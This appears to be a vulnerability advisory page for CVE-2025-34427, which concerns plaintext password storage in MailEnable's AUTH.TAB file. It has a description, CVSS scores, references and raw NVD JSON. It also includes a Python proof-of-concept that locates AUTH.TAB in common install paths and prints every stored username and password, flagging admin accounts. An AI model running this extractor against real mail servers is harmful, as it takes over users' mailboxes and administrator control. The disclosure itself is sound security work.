CVE-2025-34427

Description

MailEnable versions prior to 10.54 contain a cleartext storage of credentials vulnerability that can lead to local credential compromise and account takeover. The product stores user and administrative passwords in plaintext within AUTH.TAB with overly permissive filesystem access. A local authenticated user with read access to this file can recover all user passwords and super-admin credentials, then use them to authenticate to MailEnable services such as POP3, SMTP, or the webmail interface, enabling unauthorized mailbox access and administrative control.

CVSS Details

CVSS Score

7.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:mailenable:mailenable:*:*:*:*:standard:*:*:* - VULNERABLE

MailEnable < 10.54

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
"""
CVE-2025-34427 PoC - MailEnable AUTH.TAB Cleartext Credentials
Note: This PoC is for educational and authorized testing purposes only.
"""

import os
import sys
import re

def read_auth_tab(file_path):
    """
    Read and parse MailEnable AUTH.TAB file
    AUTH.TAB format typically contains entries like:
    USERNAME:PASSWORD:DOMAIN:FLAGS
    """
    credentials = []
    try:
        with open(file_path, 'r', encoding='utf-8', errors='ignore') as f:
            for line in f:
                line = line.strip()
                if not line or line.startswith('#'):
                    continue
                parts = line.split(':')
                if len(parts) >= 2:
                    username = parts[0]
                    password = parts[1]
                    domain = parts[2] if len(parts) > 2 else 'N/A'
                    flags = parts[3] if len(parts) > 3 else 'N/A'
                    credentials.append({
                        'username': username,
                        'password': password,
                        'domain': domain,
                        'flags': flags
                    })
    except FileNotFoundError:
        print(f'[-] AUTH.TAB file not found: {file_path}')
    except PermissionError:
        print(f'[-] Permission denied reading: {file_path}')
    except Exception as e:
        print(f'[-] Error reading file: {e}')
    return credentials

def find_auth_tab_paths():
    """Common MailEnable installation paths for AUTH.TAB"""
    common_paths = [
        r'C:\Program Files\MailEnable\Config\AUTH.TAB',
        r'C:\Program Files (x86)\MailEnable\Config\AUTH.TAB',
        r'C:\MailEnable\Config\AUTH.TAB',
        r'C:\Program Files\Mail Enable\Config\AUTH.TAB',
    ]
    return [p for p in common_paths if os.path.exists(p)]

def main():
    print('[+] CVE-2025-34427 - MailEnable AUTH.TAB Credentials Extractor')
    print('[+] Target: MailEnable < 10.54\n')
    
    # Try to find AUTH.TAB in common locations
    auth_tab_paths = find_auth_tab_paths()
    
    if not auth_tab_paths:
        print('[-] AUTH.TAB file not found in common locations')
        print('[-] Please provide the full path manually')
        return
    
    all_credentials = []
    for path in auth_tab_paths:
        print(f'[+] Found AUTH.TAB: {path}')
        creds = read_auth_tab(path)
        all_credentials.extend(creds)
        
        if creds:
            print(f'[+] Extracted {len(creds)} credential entries:\n')
            for cred in creds:
                print(f"  User: {cred['username']}@{cred['domain']}")
                print(f"  Pass: {cred['password']}")
                print(f"  Flags: {cred['flags']}\n")
    
    if all_credentials:
        print(f'[+] Total: {len(all_credentials)} credentials extracted')
        
        # Check for admin accounts
        admins = [c for c in all_credentials if 'admin' in c['username'].lower() or c['flags'] in ['A', 'SA']]
        if admins:
            print(f'[!] WARNING: Found {len(admins)} admin/superadmin accounts!')

if __name__ == '__main__':
    main()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-34427
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-34427
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-34427/
[4] VulDB https://vuldb.com/cve/CVE-2025-34427
[5] https://mailenable.com/Standard-ReleaseNotes.txt
[6] https://www.mailenable.com/
[7] https://www.vulncheck.com/advisories/mailenable-cleartext-credential-storage-in-auth-tab

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-34427", "sourceIdentifier": "[email protected]", "published": "2025-12-10T19:16:13.403", "lastModified": "2025-12-17T17:01:22.363", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "MailEnable versions prior to 10.54 contain a cleartext storage of credentials vulnerability that can lead to local credential compromise and account takeover. The product stores user and administrative passwords in plaintext within AUTH.TAB with overly permissive filesystem access. A local authenticated user with read access to this file can recover all user passwords and super-admin credentials, then use them to authenticate to MailEnable services such as POP3, SMTP, or the webmail interface, enabling unauthorized mailbox access and administrative control."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.4, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-312"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mailenable:mailenable:*:*:*:*:standard:*:*:*", "versionEndExcluding": "10.54", "matchCriteriaId": "E4DAB799-EDB6-48D7-A7FD-77D9910CB308"}]}]}], "references": [{"url": "https://mailenable.com/Standard-ReleaseNotes.txt", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://www.mailenable.com/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.vulncheck.com/advisories/mailenable-cleartext-credential-storage-in-auth-tab", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}